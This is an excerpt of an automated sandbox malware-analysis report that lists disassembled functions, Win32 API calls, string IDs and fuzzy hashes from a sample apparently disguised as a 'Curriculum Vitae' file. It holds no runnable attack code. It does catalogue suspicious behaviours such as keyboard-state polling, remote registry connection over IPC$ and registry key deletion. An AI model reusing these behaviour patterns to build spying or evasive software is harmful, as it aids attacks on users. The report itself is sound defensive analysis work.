                      • Instruction Fuzzy Hash: 8191AF71204706AFDB19DF64C885FAAF7A8FF44350F048629F999D2190DB30EA59CBB1
                      APIs
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D94994
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D949DA
                      • _wcslen.LIBCMT ref: 00D949EB
                      • CharUpperBuffW.USER32(?,00000000), ref: 00D949F7
                      • _wcsstr.LIBVCRUNTIME ref: 00D94A2C
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D94A64
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D94A9D
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D94AE6
                      • GetClassNameW.USER32(?,?,00000400), ref: 00D94B20
                      • GetWindowRect.USER32(?,?), ref: 00D94B8B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                      • String ID: ThumbnailClass
                      • API String ID: 1311036022-1241985126
                      • Opcode ID: ce7c85be459a23b0d4334801b10fd662c29d8e7c70986e6b60c38a12eae59d51
                      • Instruction ID: 044a21c561a18d70b3ed9dfc45648b3a179646671bf5cd6db63ef6c2674c32aa
                      • Opcode Fuzzy Hash: ce7c85be459a23b0d4334801b10fd662c29d8e7c70986e6b60c38a12eae59d51
                      • Instruction Fuzzy Hash: 17919B711042069FDF04DF14C995FAAB7E8EF84358F088469FD899A196DB30ED4ACBB1
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DC8D5A
                      • GetFocus.USER32 ref: 00DC8D6A
                      • GetDlgCtrlID.USER32(00000000), ref: 00DC8D75
                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00DC8E1D
                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00DC8ECF
                      • GetMenuItemCount.USER32(?), ref: 00DC8EEC
                      • GetMenuItemID.USER32(?,00000000), ref: 00DC8EFC
                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00DC8F2E
                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00DC8F70
                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DC8FA1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                      • String ID: 0
                      • API String ID: 1026556194-4108050209
                      • Opcode ID: 214789858a91d48d27e0e6c95d44e84386944924555883972300ca2662f26799
                      • Instruction ID: bac1e4bd7d37ff7d624f5f7ea9fef79443f359f823bf7de7095375cc43b63a99
                      • Opcode Fuzzy Hash: 214789858a91d48d27e0e6c95d44e84386944924555883972300ca2662f26799
                      • Instruction Fuzzy Hash: 35817A715083029FDB11CF24C884EABBBE9EF88314F18095DF98997291DB31D905EBB1
                      APIs
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DBCC64
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DBCC8D
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DBCD48
                        • Part of subcall function 00DBCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DBCCAA
                        • Part of subcall function 00DBCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DBCCBD
                        • Part of subcall function 00DBCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DBCCCF
                        • Part of subcall function 00DBCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DBCD05
                        • Part of subcall function 00DBCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DBCD28
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DBCCF3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 2734957052-4033151799
                      • Opcode ID: bf9d0802544c770355d6d92812cf97856ebb1a9fcb2d4112ad939ccab5ddca49
                      • Instruction ID: 1ef570a1417914ad930d77c04eda50ac22d8871b23699673d15ea730f0354388
                      • Opcode Fuzzy Hash: bf9d0802544c770355d6d92812cf97856ebb1a9fcb2d4112ad939ccab5ddca49
                      • Instruction Fuzzy Hash: B331807591122AFBD7208B51DC88EFFBB7CFF55750F041165EA0AE2240D6309A45AAB0
                      APIs
                      • timeGetTime.WINMM ref: 00D9E6B4
                        • Part of subcall function 00D4E551: timeGetTime.WINMM(?,?,00D9E6D4), ref: 00D4E555
                      • Sleep.KERNEL32(0000000A), ref: 00D9E6E1
                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00D9E705
                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D9E727
                      • SetActiveWindow.USER32 ref: 00D9E746
                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D9E754
                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D9E773
                      • Sleep.KERNEL32(000000FA), ref: 00D9E77E
                      • IsWindow.USER32 ref: 00D9E78A
                      • EndDialog.USER32(00000000), ref: 00D9E79B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                      • String ID: BUTTON
                      • API String ID: 1194449130-3405671355
                      • Opcode ID: 92e8493d8304e84752078340aa9b878cf3800311636aa805dde8a785146ae96d
                      • Instruction ID: ed60e8a1fb33881c781415426982f3e95044d6da291ee9bfe9256cb8a94f6be0
                      • Opcode Fuzzy Hash: 92e8493d8304e84752078340aa9b878cf3800311636aa805dde8a785146ae96d
                      • Instruction Fuzzy Hash: 8D218470210306AFEF00AF62EC8DE253BA9F754748B181428F605D16B1DB73AC849B35
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D9EA5D
                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D9EA73
                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D9EA84
                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D9EA96
                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D9EAA7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: SendString$_wcslen
                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                      • API String ID: 2420728520-1007645807
                      • Opcode ID: 091b8b0e10fc5a5171f5e39689673fb2211f5972699e6ce62705e074c72602bb
                      • Instruction ID: 742265247861daeb6a75400b09bfb8bb67e2e4e01238fbb3759aade5d3383f6e
                      • Opcode Fuzzy Hash: 091b8b0e10fc5a5171f5e39689673fb2211f5972699e6ce62705e074c72602bb
                      • Instruction Fuzzy Hash: E1114221A9025D7DDB10E766DD4ADFB6B7CEBD1B00F454429B501A20D1EEF05909CAB0
                      APIs
                      • GetDlgItem.USER32(?,00000001), ref: 00D95CE2
                      • GetWindowRect.USER32(00000000,?), ref: 00D95CFB
                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D95D59
                      • GetDlgItem.USER32(?,00000002), ref: 00D95D69
                      • GetWindowRect.USER32(00000000,?), ref: 00D95D7B
                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D95DCF
                      • GetDlgItem.USER32(?,000003E9), ref: 00D95DDD
                      • GetWindowRect.USER32(00000000,?), ref: 00D95DEF
                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D95E31
                      • GetDlgItem.USER32(?,000003EA), ref: 00D95E44
                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D95E5A
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00D95E67
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ItemMoveRect$Invalidate
                      • String ID:
                      • API String ID: 3096461208-0
                      • Opcode ID: 5c896c214129214912f68d67bec944067f1c6f59996183389c701a2160d5f843
                      • Instruction ID: 73f85f17d203a4f9e335d66505e4f23bdf00bcc3974ac1291d0097d8a212deb7
                      • Opcode Fuzzy Hash: 5c896c214129214912f68d67bec944067f1c6f59996183389c701a2160d5f843
                      • Instruction Fuzzy Hash: 3E51FCB1A10706AFDF19CF68DD89EAEBBB5EB48300F148129F519E6294D7709E04CB60
                      APIs
                        • Part of subcall function 00D48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D48BE8,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48FC5
                      • DestroyWindow.USER32(?), ref: 00D48C81
                      • KillTimer.USER32(00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D48D1B
                      • DestroyAcceleratorTable.USER32(00000000), ref: 00D86973
                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D869A1
                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000,?), ref: 00D869B8
                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D48BBA,00000000), ref: 00D869D4
                      • DeleteObject.GDI32(00000000), ref: 00D869E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                      • String ID:
                      • API String ID: 641708696-0
                      • Opcode ID: 5106abbbbeeab330a5985a817c655ba1bd3a98f5a22988ff9a4ddd6a7b0bb622
                      • Instruction ID: 9323f9e539511fc56bcb4b73790fc9573bff73eb1cae0a2b8adb03df5158bdee
                      • Opcode Fuzzy Hash: 5106abbbbeeab330a5985a817c655ba1bd3a98f5a22988ff9a4ddd6a7b0bb622
                      • Instruction Fuzzy Hash: 81618C30502711DFCB25AF15D988B2977F1FB40362F585558E186AB6A0CB32E9D4EFB0
                      APIs
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      • GetSysColor.USER32(0000000F), ref: 00D49862
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ColorLongWindow
                      • String ID:
                      • API String ID: 259745315-0
                      • Opcode ID: f60ec6abafbd8ee1160fdb927414ad9826ee76d18fb233f59176982c67779dc3
                      • Instruction ID: 6f0acfcc0a6bb2c85f414a3d97acef85125bd99c0f64cec56ac86134e4aa6ab1
                      • Opcode Fuzzy Hash: f60ec6abafbd8ee1160fdb927414ad9826ee76d18fb233f59176982c67779dc3
                      • Instruction Fuzzy Hash: 76418F311047419FDB209F3E9C94BBA7B65AB46320F285655FAA6872E5C731DC42DB30
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00D7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00D99717
                      • LoadStringW.USER32(00000000,?,00D7F7F8,00000001), ref: 00D99720
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00D99742
                      • LoadStringW.USER32(00000000,?,00D7F7F8,00000001), ref: 00D99745
                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00D99866
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wcslen
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                      • API String ID: 747408836-2268648507
                      • Opcode ID: 778568a80a0788f50c14542ff0f5febac8d5e882a44a1c604957545f0dc95896
                      • Instruction ID: 794d8133c1b7dc80c280816e197db565cfb99314d21c4e11fadfc3958e7e60bd
                      • Opcode Fuzzy Hash: 778568a80a0788f50c14542ff0f5febac8d5e882a44a1c604957545f0dc95896
                      • Instruction Fuzzy Hash: 59412A72804209AACF04FBE4CE96EEEB778EF55340F504169F60572092EA75AF48CB71
                      APIs
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00D907A2
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00D907BE
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00D907DA
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00D90804
                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00D9082C
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D90837
                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00D9083C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 323675364-22481851
                      • Opcode ID: 96a5fe42479073832f7d10d4c14bb8d6f7be7a50e150a4d16de5c7b93508edd5
                      • Instruction ID: 65c1695917f18e4832b0973a42da0aa64f4727069072688be0489aa658243edf
                      • Opcode Fuzzy Hash: 96a5fe42479073832f7d10d4c14bb8d6f7be7a50e150a4d16de5c7b93508edd5
                      • Instruction Fuzzy Hash: 5B41F272910229AFDF15EBA4EC95DEDB778EF44350F458129EA05A2260EA709E04CAB0
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 00DA7AF3
                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DA7B8F
                      • SHGetDesktopFolder.SHELL32(?), ref: 00DA7BA3
                      • CoCreateInstance.OLE32(00DCFD08,00000000,00000001,00DF6E6C,?), ref: 00DA7BEF
                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DA7C74
                      • CoTaskMemFree.OLE32(?,?), ref: 00DA7CCC
                      • SHBrowseForFolderW.SHELL32(?), ref: 00DA7D57
                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DA7D7A
                      • CoTaskMemFree.OLE32(00000000), ref: 00DA7D81
                      • CoTaskMemFree.OLE32(00000000), ref: 00DA7DD6
                      • CoUninitialize.OLE32 ref: 00DA7DDC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                      • String ID:
                      • API String ID: 2762341140-0
                      • Opcode ID: 6e0e9b2fd4320007ed6271d1e2234a6119966ee81f2dac10b920a4acbe2c7147
                      • Instruction ID: 54c29205ed932001984cc22ef57056f450f91a398424c40f0b855b548c8b400a
                      • Opcode Fuzzy Hash: 6e0e9b2fd4320007ed6271d1e2234a6119966ee81f2dac10b920a4acbe2c7147
                      • Instruction Fuzzy Hash: 15C10975A04209AFCB14DF64C884DAEBBB9FF49314B148499E91ADB361D730EE45CBA0
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DC5504
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC5515
                      • CharNextW.USER32(00000158), ref: 00DC5544
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DC5585
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DC559B
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC55AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$CharNext
                      • String ID:
                      • API String ID: 1350042424-0
                      • Opcode ID: 3563e5818f5bae37f05f235e4c0e05c96e680fb5078c1b9d5e5fa0fd001f4f05
                      • Instruction ID: 81e305135d300a7520eaf550b1ebba6861098f30c7c7787f1e1334190bc5396d
                      • Opcode Fuzzy Hash: 3563e5818f5bae37f05f235e4c0e05c96e680fb5078c1b9d5e5fa0fd001f4f05
                      • Instruction Fuzzy Hash: 6B617D3190460AEBDF108F54EC84EFE7BB9EB09720F144149F665AB2A5D770AAC1DB70
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D8FAAF
                      • SafeArrayAllocData.OLEAUT32(?), ref: 00D8FB08
                      • VariantInit.OLEAUT32(?), ref: 00D8FB1A
                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D8FB3A
                      • VariantCopy.OLEAUT32(?,?), ref: 00D8FB8D
                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D8FBA1
                      • VariantClear.OLEAUT32(?), ref: 00D8FBB6
                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00D8FBC3
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D8FBCC
                      • VariantClear.OLEAUT32(?), ref: 00D8FBDE
                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D8FBE9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: a4ff2e1bd8b4ef89c503dfda8acdc769333d9b8786da69e6edb4d5343f8fcaaf
                      • Instruction ID: 26951536bd7ac857c4c021d8ea08adca42edd181c909d932744872181f620d4d
                      • Opcode Fuzzy Hash: a4ff2e1bd8b4ef89c503dfda8acdc769333d9b8786da69e6edb4d5343f8fcaaf
                      • Instruction Fuzzy Hash: FE413035A1421AAFCB04EF64C854DADBBB9EF48354F048065E959E7261D730B945CFB0
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00D99CA1
                      • GetAsyncKeyState.USER32(000000A0), ref: 00D99D22
                      • GetKeyState.USER32(000000A0), ref: 00D99D3D
                      • GetAsyncKeyState.USER32(000000A1), ref: 00D99D57
                      • GetKeyState.USER32(000000A1), ref: 00D99D6C
                      • GetAsyncKeyState.USER32(00000011), ref: 00D99D84
                      • GetKeyState.USER32(00000011), ref: 00D99D96
                      • GetAsyncKeyState.USER32(00000012), ref: 00D99DAE
                      • GetKeyState.USER32(00000012), ref: 00D99DC0
                      • GetAsyncKeyState.USER32(0000005B), ref: 00D99DD8
                      • GetKeyState.USER32(0000005B), ref: 00D99DEA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: a853f83403be82ad7574a29ad3175a25b49cfa739f431300b6de7b0bab7b22a1
                      • Instruction ID: 7523d573698ea136697e5e3f4ed6babfe8fcb19899e31364b3b0e41204d1630a
                      • Opcode Fuzzy Hash: a853f83403be82ad7574a29ad3175a25b49cfa739f431300b6de7b0bab7b22a1
                      • Instruction Fuzzy Hash: EA41A6345047CA69FF31966888647B5FEA06F12344F0C805EDAC6576C2EBA599C8C7B2
